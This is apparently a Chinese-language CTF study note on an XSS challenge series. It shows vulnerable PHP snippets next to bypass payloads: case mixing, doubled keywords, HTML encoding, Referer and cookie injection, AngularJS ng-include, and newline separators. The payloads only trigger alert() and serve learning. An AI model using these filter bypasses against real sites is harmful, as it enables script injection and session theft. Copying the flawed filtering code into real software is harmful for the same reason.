xss

htmlspecialchars绕过

1. 默认设置时不过滤单引号

   <?php echo "<input name=biubiu value='".htmlspecialchars($str)."'>";?>

   绕过： ' onclick='alert('xss')

str_replace()绕过

1.

<?php
	$str = strtolower($_GET["keyword"]);//都变成小写
	$str1 = str_replace("<script","<scr_pit",$str);  
	$str2 = str_replace("<script","<scr_pit",$str1);
	//...
	echo '<input name=keyword  value="'.$str3.'">';
?>

绕过: "> <a href="javascript: alert('xss')">hi</a><"

2. 大小写绕过

   <?php 
   	$str = strtolower($_GET["keyword"]);
   	$str2=str_replace("<script","<scr_ipt",$str);
   	$str3=str_replace("on","o_n",$str2);
   	echo '<input name=keyword value="'.$str3.'">';
   ?>

   绕过： "> <SCRIpt>alert('xss')</ScripT><"

3. 双写

   <?php 
   	$str = strtolower($_GET["keyword"]);
   	$str2=str_replace("script","",$str);
   	$str3=str_replace("on","",$str2);
   	$str4=str_replace("src","",$str3);
   	$str5=str_replace("data","",$str4);
   	$str6=str_replace("href","",$str5);
   	echo '<input name=keyword value="'.$str6.'">';
   ?>

   绕过: "><scriscriptpt>alert('xss')</scriscriptpt><"

4. 编码绕过点我看详情

   <?php 
   $str = strtolower($_GET["keyword"]);
   $str2=str_replace("script","scr_ipt",$str);
   $str3=str_replace("on","o_n",$str2);
   $str4=str_replace("src","sr_c",$str3);
   $str5=str_replace("data","da_ta",$str4);
   $str6=str_replace("href","hr_ef",$str5);
   $str7=str_replace('"','&quot',$str6);
   echo '<input name=keyword  value="'.htmlspecialchars($str).'">';
   ?>
   <?php
    echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';//这次是这里哦
   ?>

   绕过： 对javascript:alert(‘xss’)进行html编码:

   javascript:alert(0)

逻辑

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href="您的链接不合法？有没有！">友情链接</a></center>';
        }
else
{
  echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';//ko ko da yo
}
?>

绕过： 检测到http://即可绕过,可以使用注释/* http:// */, payload:javascript:alert(0&#x29 /*http://*/;

改变input类型 小声bb完全不知道有什么用

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

payload： keyword = test&t_sort="type="text" onclick = "alert(1)

抓包

1. 普普通通

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

抓包然后构造referer

payload:referer: "type="text" onclick="alert(0)

2. cookie

<?php 
setcookie("user", "call me maybe?", time()+3600);
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_cook"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

payload: user=" type="text" onmouseover="alert('xss')注意格式

EXIF点我看详情

EXIF: 储存了照片拍摄时的信息， 包括焦距、设备，甚至是GPS定位

可以在图片的信息构造代码，进行xss

Angular Js XSS

ng-include：文件包含

xss挑战中的level15:

<html ng-app>
<head>
        <meta charset="utf-8">
        <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.2.0/angular.min.js"></script>
<script>
window.alert = function()  
{     
confirm("完成的不错！");
 window.location.href="level16.php?keyword=test"; 
}
</script>
<title>欢迎来到level15</title>
</head>
<h1 align=center>欢迎来到第15关，自己想个办法走出去吧！</h1>
<p align=center><img src=level15.png></p>
<?php 
ini_set("display_errors", 0);
$str = $_GET["src"];
echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
?>

看了网上很多人的wp，属实一个模子出来的，也没看太懂，先这样吧

payload:src='level1.php?name=<img src=x onerror=alert(0)>'

用%0d 或%0a做分隔符

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","&nbsp;",$str);
$str3=str_replace(" ","&nbsp;",$str2);
$str4=str_replace("/","&nbsp;",$str3);
$str5=str_replace("	","&nbsp;",$str4);
echo "<center>".$str5."</center>";
?>

payload:<img%0dsrc=x%0aonerror=alert(0)>

Flash XSS

嘤嘤嘤，好像有点难hou，而且flash你都快死了

---

找到一个好网站https://www.ctolib.com/docs/sfile/xss-naxienian/1.html